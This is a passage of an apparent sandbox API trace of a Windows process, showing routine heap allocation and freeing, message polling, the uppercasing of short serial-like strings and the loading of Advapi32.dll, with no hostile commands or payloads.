hHeap=0x25c0000) returned 1 [0198.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.627] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.627] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0198.627] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.628] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.628] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.628] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.628] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0198.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.628] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.629] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.629] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.629] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.631] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.632] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.632] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.633] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.633] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0198.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.633] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0198.634] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0198.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0198.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0198.634] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.634] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.635] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.636] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.636] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.637] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 